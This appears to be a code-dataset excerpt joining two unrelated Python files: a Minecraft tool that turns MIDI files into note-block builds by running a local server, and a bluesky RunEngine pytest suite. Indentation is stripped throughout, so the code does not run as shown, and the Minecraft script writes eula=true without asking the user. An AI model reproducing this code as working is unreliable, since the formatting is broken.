"25,26,27,28,29,30,31,21": "guitar",
"33,34,35,36": "bass",
"37,38": "basedrum",
"39,40": "bass",
"113": "bell",
"114": "hat",
"115": "basedrum",
"116": "hat",
"117": "snare",
"118": "basedrum",
"119": "snare"
}
channel10 = {
"27": "basedrum",
"28": "snare",
"29": "hat",
"30": "snare",
"31": "hat",
"32": "hat",
"33": "hat",
"34": "bell",
"35": "basedrum",
"36": "hat",
"37": "hat",
"38": "snare",
"39": "hat",
"40": "snare",
"41": "basedrum",
"42": "hat",
"43": "basedrum",
"44": "snare",
"45": "basedrum",
"46": "hat",
"47": "basedrum",
"48": "basedrum",
"49": "snare",
"50": "snare",
"51": "snare",
"52": "hat",
"53": "bell",
"54": "snare",
"55": "snare",
"56": "bell",
"57": "snare",
"58": "snare",
"59": "snare",
"60": "snare",
"61": "snare",
"62": "snare",
"63": "snare",
"64": "snare",
"65": "hat",
"66": "hat",
"67": "hat",
"67": "hat",
"68": "hat",
"69": "hat",
"70": "hat",
"71": "bell",
"72": "bell",
"73": "hat",
"74": "basedrum",
"75": "hat",
"76": "hat",
"77": "hat",
"78": "snare",
"79": "snare",
"80": "bell",
"81": "bell",
"82": "hat",
"83": "snare",
"84": "chime",
"85": "hat",
"86": "basedrum",
"87": "basedrum"
}
def get_percussion(instrument):
instrument = str(instrument)
for x in MidiTranslationManager.channel10:
if x == instrument or ("," + instrument + ",") in x or x.startswith(instrument + ",") or x.endswith("," + instrument):
return MidiTranslationManager.channel10[x]
return "piano"
def get_instrument(instrument):
instrument = str(instrument)
for x in MidiTranslationManager.midi:
if x == instrument or ("," + instrument + ",") in x or x.startswith(instrument + ",") or x.endswith("," + instrument):
return MidiTranslationManager.midi[x]
return "piano"
def get_block(instrument):
return MidiTranslationManager.blocks[instrument]
def note_block_pitch(midipitch):
pitch = midipitch - 54
while pitch < 0:
pitch += 12
while pitch > 24:
pitch -= 12
return pitch
class NoteBlockMessage:
def __init__(self, note, instrument, leading_delay, delay):
self.instrument = instrument
self.note = note
self.leading_delay = leading_delay
self.delay = delay
self.is_percussion = False
class NoteBlockConverter:
def __init__(self, fp):
self.midi = mido.MidiFile(fp)
self.midi_messages = []
self.noteblock = []
self.tempo_modifier = 1.0
self.channel10 = True
def extract_messages(self):
for message in self.midi:
self.midi_messages.append(message)
def generate_noteblock_objects(self):
channel_instrument = {}
total_delay = 0.0
output = []
for message in self.midi_messages:
if message.is_meta:
continue
if message.type == "program_change":
channel_instrument[message.channel] = message.program
if message.type in ["note_on", "note_off"]:
instrument = channel_instrument[message.channel] if message.channel in channel_instrument else 0
nbm = NoteBlockMessage(message.note if message.type == "note_on" else None, instrument, total_delay, message.time)
if message.channel == 9 and self.channel10:
nbm.is_percussion = True
output.append(nbm)
try:
total_delay += message.time / self.tempo_modifier
except:
pass
block_groups = [[]]
for message in output:
if len(block_groups[-1]) != 0:
if message.leading_delay != block_groups[-1][-1].leading_delay:
block_groups.append([])
block_groups[-1].append(message)
self.noteblock = block_groups
class NoteBlockLane:
def __init__(self):
self.objects = []
def add_repeater(self, ticks):
add = ticks
if len(self.objects) > 0:
if self.objects[-1][0] == "repeater": # stack up ticks instead of adding a bunch of 1 tick repeaters
total = self.objects[-1][1] + ticks
self.objects[-1][1] = min([total, 4])
add = max([total - 4, 0])
if add == 0:
return
self.objects.append(["repeater", add])
def add_blocks(self, blocks):
self.objects.append(["blocks", blocks])
def add_stud(self):
self.objects.append(["stud", None])
class NoteBlockStructureGenerator:
def __init__(self, noteblockmessages):
self.messages = noteblockmessages
self.structures = []
self.command_delay = 0.0
self.server_instance = None
self.line1 = "black_wool"
self.line2 = "black_wool"
self.studs = ["red_wool", "orange_wool", "yellow_wool", "lime_wool", "light_blue_wool", "cyan_wool", "blue_wool", "purple_wool", "magenta_wool"]
self.facing = {
0: "south",
1: "west",
2: "north",
3: "east"
}
def generate(self):
biggest_frame = max([len([y for y in x if y.note != None]) for x in self.messages])
lanes = [NoteBlockLane() for x in range(0, math.ceil(biggest_frame / 3))]
time = -0.1
current_items = [item for sublist in self.messages.copy() for item in sublist]
current_items = [item for item in current_items if item.note != None]
max_time = max([item.leading_delay for item in current_items])
while not (time > max_time):
time += 0.1
tick = []
for x in current_items:
if time > x.leading_delay and x.note != None:
tick.append(x)
lane_number = 0
notes_lanes = [tick[x:x+3] for x in range(0, len(tick), 3)]
if len(notes_lanes) != 0:
for x in range(0, len(lanes)):
if x >= len(notes_lanes):
lanes[x].add_stud()
continue
lanes[x].add_blocks(notes_lanes[x])
for x in tick:
current_items.remove(x)
for x in lanes:
x.add_repeater(1)
self.structures = lanes
def place_block(self, x, y, z, block):
#print("setblock %s %s %s %s" % (x, y, z, block))
self.server_instance.send_command("setblock %s %s %s %s" % (x, y, z, block))
time.sleep(self.command_delay)
def build(self, server_instance, x_pos, y_pos, z_pos, direction):
print('direction is ' + str(direction))
self.server_instance = server_instance
forward_x = 0 if direction % 2 == 0 else direction - 2
forward_z = 0 if direction % 2 != 0 else 2 - direction - 1
sideways_x = 0 - forward_z if direction % 2 == 0 else forward_z
sideways_z = 0 - forward_x if direction % 2 == 0 else forward_x
border_x = x_pos
border_z = z_pos
x_pos += sideways_x * 2
z_pos += sideways_z * 2
max_entries = max([len(x.objects) for x in self.structures])
for x in range(0, max_entries):
current_border_x = border_x + forward_x * x
current_border_z = border_z + forward_z * x
current_x = x_pos + forward_x * x
current_z = z_pos + forward_z * x
self.place_block(current_border_x, y_pos + 2, current_border_z, self.line1)
self.place_block(current_border_x + sideways_x * len(self.structures) * 3 + sideways_x, y_pos + 2, current_border_z + sideways_z * len(self.structures) * 3 + sideways_z, self.line2)
self.place_block(current_border_x, y_pos + 1, current_border_z, self.line1)
self.place_block(current_border_x + sideways_x * len(self.structures) * 3 + sideways_x, y_pos + 1, current_border_z + sideways_z * len(self.structures) * 3 + sideways_z, self.line2)
for y in range(0, len(self.structures)):
lane = self.structures[y]
lane_x = current_x + sideways_x * 3 * y
lane_z = current_z + sideways_z * 3 * y
if x < len(lane.objects):
item = lane.objects[x]
if (item[0] == "repeater"):
self.place_block(lane_x, y_pos + 1, lane_z, "iron_block")
self.place_block(lane_x, y_pos + 2, lane_z, "repeater[facing=%s,delay=%s]" % (self.facing[direction], item[1]))
if (item[0] == "stud"):
self.place_block(lane_x, y_pos + 2, lane_z, self.studs[(math.floor(x / 2) + y) % len(self.studs)])
if (item[0] == "blocks"):
start_x = lane_x
start_z = lane_z
if len(item[1]) > 1:
start_x = start_x + sideways_x * -1
start_z = start_z + sideways_z * -1
for z in item[1]:
inst = MidiTranslationManager.get_instrument(z.instrument) if not z.is_percussion else MidiTranslationManager.get_percussion(z.note)
note = z.note if not z.is_percussion else 48
pitch = MidiTranslationManager.note_block_pitch(note)
material = MidiTranslationManager.get_block(inst)
if material in ["sand", "gravel"]:
self.place_block(start_x, y_pos, start_z, "iron_block")
self.place_block(start_x, y_pos + 1, start_z, material)
self.place_block(start_x, y_pos + 2, start_z, "note_block[note=" + str(pitch) + ("," + "instrument=" + inst if inst != "piano" else "") + "]")
start_x = start_x + sideways_x
start_z = start_z + sideways_z
class MinecraftServerWrapper:
def __init__(self):
self.path_manager = PathManager()
self.server_process = None
self.server_logs = []
self.output_thread = None
self.remake_flat = False
self.server_ready = False
self.logging_paused = False
self._logging_paused = False
self.logging_disabled = False
self.pause_queue = []
if not os.path.isfile(self.path_manager.get_path("$minecraft_server_1.13.1.jar")):
print("[s] downloading minecraft server...")
server_jar = requests.get(r"https://launcher.mojang.com/v1/objects/fe123682e9cb30031eae351764f653500b7396c9/server.jar")
if server_jar.status_code == 200:
server_file = open(self.path_manager.get_path("$minecraft_server_1.13.1.jar"), "wb")
server_file.write(server_jar.content)
server_file.close()
print("[s] done!")
else:
print("[s] error: bad response")
eula_file = open(self.path_manager.get_path("$eula.txt"), "w")
eula_file.write("eula=true")
eula_file.close()
def server_output_thread(self):
while self.server_process == None:
time.sleep(1)
for line in iter(self.server_process.stdout.readline, b''):
if self.logging_paused and not self._logging_paused:
self.pause_queue = []
self._logging_paused = True
if not self.logging_paused and self._logging_paused:
self._logging_paused = False
if not self.logging_disabled:
for x in self.pause_queue:
self.server_logs.append(x)
self.on_server_log(x)
if not self.logging_disabled:
self.server_logs.append(line)
self.on_server_log(line)
self.on_server_close()
def send_command(self, text):
self.server_process.stdin.writelines([text.encode() + b'\r'])
self.server_process.stdin.flush()
def get_log_output(self, text):
t = text.split(']', 1)
if len(t) < 2:
return text
return t[-1][2:].strip('\n').replace('\r', '')
def on_server_log(self, text):
self.log_event(self, text)
compare_text = self.get_log_output(text.decode())
if compare_text.startswith('Done (') and compare_text.endswith(')! For help, type "help"'):
propreties = open(self.path_manager.get_path("$server.properties"), "r")
is_flat = True in [False if (x.startswith('#') or x.strip() == "") else (False if x.split('=', 1)[0] != "level-type" else (False if x.split('=', 1)[1].lower() == "flat" else True)) for x in propreties.readlines()]
propreties.close()
if not is_flat:
print('[s] world is not flat type. fixing..')
self.remake_flat = True
self.send_command("stop")
else:
self.server_ready = True
def log_event(self, me, text):
print(text.decode(), end="")
sys.stdout.flush()
def on_server_close(self):
print('[s] server closed!')
if self.remake_flat == True:
time.sleep(2)
self.server_process.terminate()
shutil.rmtree(self.path_manager.get_path("$world"))
propreties = open(self.path_manager.get_path("$server.properties"), "r")
lines = propreties.readlines()
propreties.close()
propreties = open(self.path_manager.get_path("$server.properties"), "w")
propreties.writelines([x if (x.startswith('#') or x.strip() == "") else (x if x.split('=', 1)[0] != "level-type" else ("level-type=FLAT\n")) for x in lines])
propreties.close()
self.start_server()
def start_server(self):
self.server_process = None
self.server_logs = []
self.output_thread = None
self.remake_flat = False
self.server_ready = False
if not os.path.isfile(self.path_manager.get_path("$minecraft_server_1.13.1.jar")):
return
self.output_thread = threading.Thread(target=self.server_output_thread)
self.output_thread.start()
startup = subprocess.STARTUPINFO()
startup.dwFlags |= subprocess.STARTF_USESHOWWINDOW
print('[s] starting server..')
self.server_process = subprocess.Popen(["java", "-Xmx1G", "-Xms1G", "-jar", self.path_manager.get_path("$minecraft_server_1.13.1.jar"), "nogui"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=startup)
class NoteblockerCI:
def __init__(self):
self.minecraft_server = MinecraftServerWrapper()
self.minecraft_server.log_event = self.log_event
self.repeaterfix = True
self.pythonw = "pythonw" in os.path.split(sys.executable)[1]
self.tempo_modifier = 1.0
self.channel10 = True
self.facing_repeaterfix = {
0: "north",
1: "east",
2: "south",
3: "west"
}
def log_event(self, me, text):
if len(me.server_logs) == 0:
print()
print(text.decode(), end="")
sys.stdout.flush()
def ready_server(self):
self.minecraft_server.start_server()
print('waiting for server', end="")
while True:
if len(self.minecraft_server.server_logs) == 0:
print(".", end="")
time.sleep(1)
if self.minecraft_server.server_ready:
break
def try_get_arg(self, argslist, index, atype):
try:
return atype(argslist[index])
except:
return None
def input_if_none(self, arg, argname, reqtype):
if arg != None:
return arg
return self.input_arg(argname, reqtype)
def input_arg(self, name, reqtype):
try:
typename = type(reqtype()).__name__
except:
typename = str(reqtype)
while True:
a = input("enter " + str(name) + ": ")
try:
return reqtype(a)
except:
print("please enter a" + ("n" if typename[0] in "aeiou" else "") + " " + typename.upper())
def console(self):
if self.pythonw:
print("warning: console inputs do not work properly in idle or other windowed environments. disabling server log.")
self.minecraft_server.logging_disabled = True
print('welcome to the noteblocker console! for help try ?')
while True:
try:
print('> ', end="")
sys.stdout.flush()
q = sys.stdin.readline()
sys.stdout.flush()
except KeyboardInterrupt:
break
try:
self.process_command(q)
except KeyboardInterrupt:
continue
except BaseException as e:
print('an error occurred while executing this command')
print("\n".join(traceback.format_exception(type(e), e, e.__traceback__)))
print('kthxbai')
try:
self.minecraft_server.send_command("")
self.minecraft_server.send_command("stop")
except:
pass
def process_command(self, q):
if q.strip() == "":
return
command = q.strip().split()
if q.strip() == "?":
print("/command - starting a command with / executes a minecraft server side command e.g. /op <player>")
print("nbgen (x) (y) (z) (direction - north/east/south/west) - generates a noteblock sequence. a path will be prompted later. you can if you want but do not need to provide coords/direction. make sure that area of the world is loaded!")
print("repeaterfix <on/off> - in 1.13.1 there is a bug that causes repeaters to place facing the wrong direction. this toggles a fix for this. [on by default]")
print("tempomod (float) - edits the tempo modifier [default 1.0]")
if q.strip().startswith('/'):
self.minecraft_server.send_command(q.strip()[1:])
if command[0] == "repeaterfix":
on = self.try_get_arg(command, 1, str)
if on == None:
print('repeaterfix is ' + 'on.' if self.repeaterfix else 'off.')
return
if not (on.strip().lower() in ['on', 'off']):
print('please provide ON or OFF.')
return
self.repeaterfix = on.strip().lower() == 'on'
print("changed the state of repeaterfix.")
if command[0] == "tempomod":
mod = self.try_get_arg(command, 1, float)
if mod == None:
print('the tempo modifier is ' + str(self.tempo_modifier))
return
self.tempo_modifier = mod
print("changed the tempo modifier to " + str(self.tempo_modifier))
if command[0] == "nbgen":
x = self.try_get_arg(command, 1, int)
y = self.try_get_arg(command, 2, int)
z = self.try_get_arg(command, 3, int)
direction = self.try_get_arg(command, 4, str)
if not direction in ["north", "east", "south", "west"]:
direction = None
m = FilePathInputManager()
print('please choose a path (if not prompted below, look for a file window)')
midipath = m.get()
if not os.path.isfile(midipath):
print("invalid path")
return
x = self.input_if_none(x, "x position", int)
y = self.input_if_none(y, "y position", int)
z = self.input_if_none(z, "z position", int)
while True:
if direction in ['north', 'south', 'east', 'west']:
break
print('input a direction (north/south/east/west)')
direction = input('> ').strip().lower()
direction = {'south': 0, 'west': 1, 'north': 2, 'east': 3}[direction]
print('reading file..')
c = NoteBlockConverter(midipath)
c.tempo_modifier = self.tempo_modifier
print('extracting file')
c.extract_messages()
print('generating notes')
c.generate_noteblock_objects()
g = NoteBlockStructureGenerator(c.noteblock)
if (self.repeaterfix):
g.facing = self.facing_repeaterfix
print('generating structure')
g.generate()
print('starting minecraft server')
print('building blocks..')
self.minecraft_server.logging_disabled = True
try:
g.server_instance = self.minecraft_server
g.place_block(x, y + 3, z, "lapis_block")
rotation = (direction + 2) % 4 * 4
filename = os.path.split(midipath)[1]
filename_chunked = [filename[x:x+14] for x in range(0, len(filename), 14)]
while len(filename_chunked) < 4:
filename_chunked.append("")
filename_chunked = filename_chunked[0:5]
g.place_block(x, y + 4, z,r"""minecraft:sign[rotation=%s]{Text1:"{\"text\":\"%s\",\"color\":\"blue\"}",Text2:"{\"text\":\"%s\",\"color\":\"blue\"}",Text3:"{\"text\":\"%s\",\"color\":\"blue\"}",Text4:"{\"text\":\"%s\",\"color\":\"blue\"}"}""" % tuple([rotation] + filename_chunked))
g.build(self.minecraft_server, x, y, z, direction)
except BaseException as e:
time.sleep(2)
if not self.pythonw:
self.minecraft_server.logging_disabled = False
raise e
time.sleep(2)
if not self.pythonw:
self.minecraft_server.logging_disabled = False
print('done!!')
def run(self):
self.ready_server()
self.console()
a = NoteblockerCI()
a.run()
|
test_run_engine.py
|
from event_model import DocumentNames
import threading
import types
import os
import signal
import sys
from collections import defaultdict
import time as ttime
import pytest
from bluesky.tests import requires_ophyd
from bluesky.run_engine import (RunEngineStateMachine,
TransitionError, IllegalMessageSequence,
NoReplayAllowed, FailedStatus,
RunEngineInterrupted,
RequestStop,
RequestAbort)
from bluesky import Msg
from functools import partial
from bluesky.tests.utils import MsgCollector, DocCollector
from bluesky.plans import (count, grid_scan)
from bluesky.plan_stubs import (abs_set, trigger_and_read, checkpoint)
from bluesky.preprocessors import (finalize_wrapper, run_decorator,
reset_positions_decorator,
run_wrapper, rewindable_wrapper,
subs_wrapper, baseline_wrapper,
SupplementalData)
from .utils import _fabricate_asycio_event
def test_states():
assert RunEngineStateMachine.States.states() == ['idle',
'running',
'pausing',
'paused',
'halting',
'stopping',
'aborting',
'suspending',
'panicked',
]
def test_panic_trap(RE):
RE._state = 'panicked'
for k in RunEngineStateMachine.States.states():
if k != 'panicked':
with pytest.raises(TransitionError):
RE._state = k
def test_state_is_readonly(RE):
with pytest.raises(AttributeError):
RE.state = 'running'
@pytest.mark.parametrize("deferred_pause_delay, is_pause_set", [
(None, False), # Do not pause
(0.1, False), # Pause before the checkpoint
(1.4, True), # Pause after the checkpoint
])
def test_deferred_pause_requested(RE, deferred_pause_delay, is_pause_set):
"""
Test for ``deferred_pause_requested``.
"""
assert RE.deferred_pause_requested is False
plan = [Msg("sleep", None, 1), Msg("checkpoint"), Msg("sleep", None, 1)]
pause_req_immediate = None
def _pause():
# This function is requesting the deferred pause and reads the property
nonlocal pause_req_immediate
RE.request_pause(defer=True)
ttime.sleep(0.1)
pause_req_immediate = RE.deferred_pause_requested
t = None
if deferred_pause_delay is not None:
t = threading.Timer(deferred_pause_delay, _pause)
t.start()
try:
RE(plan)
except Exception:
pass
if deferred_pause_delay is not None:
assert pause_req_immediate is True
assert RE.deferred_pause_requested is is_pause_set
def test_verbose(RE, hw):
RE.verbose = True
assert RE.verbose
# Emit all four kinds of document, exercising the logging.
RE([Msg('open_run'), Msg('create', name='primary'), Msg('read', hw.det),
Msg('save'),
Msg('close_run')])
def test_reset(RE):
with pytest.raises(RunEngineInterrupted):
RE([Msg('open_run'), Msg('pause')])
assert len(RE._run_bundlers) > 0
RE.reset()
assert len(RE._run_bundlers) == 0
def test_running_from_paused_state_raises(RE):
with pytest.raises(RunEngineInterrupted):
RE([Msg('pause')])
assert RE.state == 'paused'
with pytest.raises(RuntimeError):
RE([Msg('null')])
RE.resume()
assert RE.state == 'idle'
RE([Msg('null')])
def test_resuming_from_idle_state_raises(RE):
with pytest.raises(RuntimeError):
RE.resume()
with pytest.raises(RunEngineInterrupted):
RE([Msg('pause')])
assert RE.state == 'paused'
RE.resume()
assert RE.state == 'idle'
with pytest.raises(RuntimeError):
RE.resume()
def test_stopping_from_idle_state_raises(RE):
with pytest.raises(TransitionError):
RE.stop()
def test_pausing_from_idle_state_raises(RE):
with pytest.raises(TransitionError):
RE.request_pause(defer=False)
def test_aborting_from_idle_state_raises(RE):
with pytest.raises(TransitionError):
RE.abort()
def test_register(RE):
mutable = {}
RE.verbose = True
async def func(msg):
mutable['flag'] = True
def plan():
yield Msg('custom-command')
RE.register_command('custom-command', func)
RE(plan())
assert 'flag' in mutable
# Unregister command; now the Msg should not be recognized.
RE.unregister_command('custom-command')
with pytest.raises(KeyError):
RE([Msg('custom-command')])
def test_stop_motors_and_log_any_errors(RE, hw):
# test that if stopping one motor raises an error, we can carry on
stopped = {}
def stop(self, *, success=False):
stopped[self.name] = True
def stop_encounters_error(self, *, success=False):
stopped[self.name] = True
raise Exception
motor = hw.motor1
broken_motor = hw.motor2
motor.stop = types.MethodType(stop, motor)
broken_motor.stop = types.MethodType(stop_encounters_error, broken_motor)
with pytest.raises(RunEngineInterrupted):
RE([Msg('set', broken_motor, 1), Msg('set', motor, 1),
Msg('pause')])
assert 'motor1' in stopped
assert 'motor2' in stopped
RE.stop()
with pytest.raises(RunEngineInterrupted):
RE([Msg('set', motor, 1), Msg('set', broken_motor, 1),
Msg('pause')])
assert 'motor1' in stopped
assert 'motor2' in stopped
RE.stop()
@requires_ophyd
def test_unstage_and_log_errors(RE):
unstaged = {}
from ophyd.sim import SynAxis
class MoverWithFlag(SynAxis):
def stage(self):
return [self]
def unstage(self):
unstaged[self.name] = True
return [self]
class BrokenMoverWithFlag(SynAxis):
def stage(self):
return [self]
def unstage(self):
unstaged[self.name] = True
return [self]
a = MoverWithFlag(name='a')
b = BrokenMoverWithFlag(name='b')
unstaged.clear()
RE([Msg('stage', a), Msg('stage', b)])
assert 'a' in unstaged
assert 'b' in unstaged
unstaged.clear()
RE([Msg('stage', b), Msg('stage', a)])
assert 'a' in unstaged
assert 'b' in unstaged
def test_open_run_twice_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('open_run')])
def test_saving_without_an_open_bundle_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('save')])
def test_dropping_without_an_open_bundle_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('drop')])
def test_opening_a_bundle_without_a_run_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('create', name='primary')])
def test_checkpoint_inside_a_bundle_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('create', name='primary'), Msg('checkpoint')])
def test_redundant_monitors_are_illegal(RE):
class Dummy:
def __init__(self, name):
self.name = name
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe(self):
return {}
def subscribe(self, *args, **kwargs):
pass
def clear_sub(self, *args, **kwargs):
pass
dummy = Dummy('dummy')
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('monitor', dummy),
Msg('monitor', dummy)])
# Monitoring, unmonitoring, and monitoring again is legal.
RE([Msg('open_run'), Msg('monitor', dummy), Msg('unmonitor', dummy),
Msg('monitor', dummy)])
# Monitoring outside a run is illegal.
with pytest.raises(IllegalMessageSequence):
RE([Msg('monitor', dummy)])
# Unmonitoring something that was never monitored is illegal.
with pytest.raises(IllegalMessageSequence):
RE([Msg('unmonitor', dummy)])
def test_empty_bundle(RE, hw):
mutable = {}
def cb(name, doc):
mutable['flag'] = True
# In this case, an Event should be emitted.
mutable.clear()
RE([Msg('open_run'), Msg('create', name='primary'), Msg('read', hw.det), Msg('save')],
{'event': cb})
assert 'flag' in mutable
# In this case, an Event should not be emitted because the bundle is
# emtpy (i.e., there are no readings.)
mutable.clear()
RE([Msg('open_run'), Msg('create', name='primary'), Msg('save')], {'event': cb})
assert 'flag' not in mutable
def test_dispatcher_unsubscribe_all(RE):
def count_callbacks(RE):
return sum([len(cbs) for cbs in
RE.dispatcher.cb_registry.callbacks.values()])
def cb(name, doc):
pass
RE.subscribe(cb)
assert count_callbacks(RE) == len(DocumentNames)
RE.dispatcher.unsubscribe_all()
assert count_callbacks(RE) == 0
def test_stage_and_unstage_are_optional_methods(RE):
class Dummy:
pass
dummy = Dummy()
RE([Msg('stage', dummy), Msg('unstage', dummy)])
def test_pause_resume_devices(RE):
paused = {}
resumed = {}
class Dummy:
def __init__(self, name):
self.name = name
def pause(self):
paused[self.name] = True
def resume(self):
resumed[self.name] = True
dummy = Dummy('dummy')
with pytest.raises(RunEngineInterrupted):
RE([Msg('stage', dummy), Msg('pause')])
RE.resume()
assert 'dummy' in paused
assert 'dummy' in resumed
def test_bad_call_args(RE):
with pytest.raises(Exception):
RE(53)
assert RE.state == 'idle'
def test_record_interruptions(RE):
docs = defaultdict(lambda: [])
def collect(name, doc):
print("HI", name)
docs[name].append(doc)
print(docs)
RE.subscribe(collect)
RE.ignore_callback_exceptions = False
RE.msg_hook = print
# The 'pause' inside the run should generate an event iff
# record_interruptions is True.
plan = [Msg('pause'), Msg('open_run'), Msg('pause'), Msg('close_run')]
assert not RE.record_interruptions
with pytest.raises(RunEngineInterrupted):
RE(plan)
with pytest.raises(RunEngineInterrupted):
RE.resume()
RE.resume()
assert len(docs['descriptor']) == 0
assert len(docs['event']) == 0
RE.record_interruptions = True
with pytest.raises(RunEngineInterrupted):
RE(plan)
with pytest.raises(RunEngineInterrupted):
RE.resume()
RE.resume()
assert len(docs['descriptor']) == 1
assert len(docs['event']) == 2
docs['event'][0]['data']['interruption'] == 'pause'
docs['event'][1]['data']['interruption'] == 'resume'
@requires_ophyd
def _make_unrewindable_marker():
from ophyd.sim import SynGauss, SynAxis
class UnReplayableSynGauss(SynGauss):
def pause(self):
raise NoReplayAllowed()
motor = SynAxis(name='motor')
def test_plan(motor, det):
yield Msg('set', motor, 0)
yield Msg('trigger', det)
yield Msg('pause')
yield Msg('set', motor, 1)
yield Msg('trigger', det)
inps = []
inps.append((test_plan,
motor,
UnReplayableSynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'pause', 'set', 'trigger']))
inps.append((test_plan,
motor,
SynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'pause',
'set', 'trigger', 'set', 'trigger']))
return pytest.mark.parametrize('plan,motor,det,msg_seq', inps)
@_make_unrewindable_marker()
def test_unrewindable_det(RE, plan, motor, det, msg_seq):
msgs = []
def collector(msg):
msgs.append(msg)
RE.msg_hook = collector
with pytest.raises(RunEngineInterrupted):
RE(plan(motor, det))
RE.resume()
assert [m.command for m in msgs] == msg_seq
@requires_ophyd
def _make_unrewindable_suspender_marker():
from ophyd.sim import SynGauss, SynAxis
class UnReplayableSynGauss(SynGauss):
def pause(self):
raise NoReplayAllowed()
motor = SynAxis(name='motor')
def test_plan(motor, det):
yield Msg('set', motor, 0)
yield Msg('trigger', det)
yield Msg('sleep', None, 1)
yield Msg('set', motor, 0)
yield Msg('trigger', det)
inps = []
inps.append((test_plan,
motor,
UnReplayableSynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'sleep',
'rewindable', 'wait_for', 'resume', 'rewindable',
'set', 'trigger']))
inps.append((test_plan,
motor,
SynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'sleep',
'rewindable', 'wait_for', 'resume', 'rewindable',
'set',
'trigger', 'sleep', 'set', 'trigger']))
return pytest.mark.parametrize('plan,motor,det,msg_seq', inps)
@_make_unrewindable_suspender_marker()
def test_unrewindable_det_suspend(RE, plan, motor, det, msg_seq):
from bluesky.utils import ts_msg_hook
msgs = []
loop = RE.loop
def collector(msg):
ts_msg_hook(msg)
msgs.append(msg)
RE.msg_hook = collector
ev = _fabricate_asycio_event(loop)
threading.Timer(.5, RE.request_suspend,
kwargs=dict(fut=ev.wait)).start()
def verbose_set():
print('seting')
ev.set()
loop.call_soon_threadsafe(
loop.call_later, 1, verbose_set)
RE(plan(motor, det))
assert [m.command for m in msgs] == msg_seq
@pytest.mark.parametrize('unpause_func', [lambda RE: RE.stop(),
lambda RE: RE.abort(),
lambda RE: RE.resume()])
def test_cleanup_after_pause(RE, unpause_func, hw):
motor = hw.motor
motor.set(1024)
@reset_positions_decorator()
def simple_plan(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('pause')
for j in range(15):
yield Msg('set', motor, -j)
with pytest.raises(RunEngineInterrupted):
RE(simple_plan(motor))
assert motor.position == 14
unpause_func(RE)
assert motor.position == 1024
@pytest.mark.parametrize('unpause_func,excp',
[(lambda RE: RE.stop(), RequestStop),
(lambda RE: RE.abort(), RequestAbort),
(lambda RE: RE.halt(), GeneratorExit)])
def test_exit_raise(RE, unpause_func, excp):
flag = False
@reset_positions_decorator()
def simple_plan():
nonlocal flag
try:
yield from checkpoint()
yield Msg('pause')
except excp:
flag = True
with pytest.raises(RunEngineInterrupted):
RE(simple_plan())
unpause_func(RE)
assert flag
@pytest.mark.skipif(
os.environ.get('TRAVIS', None) == 'true' and sys.platform == 'darwin',
reason=("The file-descriptor wake up based signal handling "
"does not work on travis on OSX"))
def test_sigint_three_hits(RE, hw):
import time
motor = hw.motor
motor.delay = .5
pid = os.getpid()
def sim_kill(n):
for j in range(n):
time.sleep(.05)
os.kill(pid, signal.SIGINT)
lp = RE.loop
motor.loop = lp
def self_sig_int_plan():
threading.Timer(.05, sim_kill, (3,)).start()
yield from abs_set(motor, 1, wait=True)
start_time = ttime.time()
with pytest.raises(RunEngineInterrupted):
RE(finalize_wrapper(self_sig_int_plan(),
abs_set(motor, 0, wait=True)))
end_time = ttime.time()
# not enough time for motor to cleanup, but long enough to start
assert 0.05 < end_time - start_time < 0.2
RE.abort() # now cleanup
done_cleanup_time = ttime.time()
# this should be 0.5 (the motor.delay) above, leave sloppy for CI
assert 0.3 < done_cleanup_time - end_time < 0.6
@pytest.mark.skipif(sys.version_info < (3, 5),
reason="requires python3.5")
def test_sigint_many_hits_pln(RE):
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL', j)
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
def hanging_plan():
"a plan that blocks the RunEngine's normal Ctrl+C handing with a sleep"
for j in range(100):
ttime.sleep(.1)
yield Msg('null')
start_time = ttime.time()
timer = threading.Timer(0.2, sim_kill, (11,))
timer.start()
with pytest.raises(RunEngineInterrupted):
RE(hanging_plan())
# Check that hammering SIGINT escaped from that 10-second sleep.
assert ttime.time() - start_time < 2
# The KeyboardInterrupt will have been converted to a hard pause.
assert RE.state == 'idle'
def test_sigint_many_hits_panic(RE):
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL', j, ttime.monotonic() - start_time)
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
def hanging_plan():
"a plan that blocks the RunEngine's normal Ctrl+C handing with a sleep"
yield Msg('null')
ttime.sleep(5)
yield Msg('null')
start_time = ttime.monotonic()
timer = threading.Timer(0.2, sim_kill, (11,))
timer.start()
with pytest.raises(RunEngineInterrupted):
RE(hanging_plan())
# Check that hammering SIGINT escaped from that 5-second sleep.
assert (ttime.monotonic() - start_time) < 2.5
# The KeyboardInterrupt but because we could not shut down, panic!
assert RE.state == 'panicked'
with pytest.raises(RuntimeError):
RE([])
with pytest.raises(RuntimeError):
RE.stop()
with pytest.raises(RuntimeError):
RE.halt()
with pytest.raises(RuntimeError):
RE.abort()
with pytest.raises(RuntimeError):
RE.resume()
with pytest.raises(RuntimeError):
RE.request_pause()
@pytest.mark.skipif(sys.version_info < (3, 5),
reason="requires python3.5")
def test_sigint_many_hits_cb(RE):
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL')
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
@run_decorator()
def infinite_plan():
while True:
yield Msg('null')
def hanging_callback(name, doc):
for j in range(100):
ttime.sleep(.1)
start_time = ttime.time()
timer = threading.Timer(0.2, sim_kill, (11,))
timer.start()
with pytest.raises(RunEngineInterrupted):
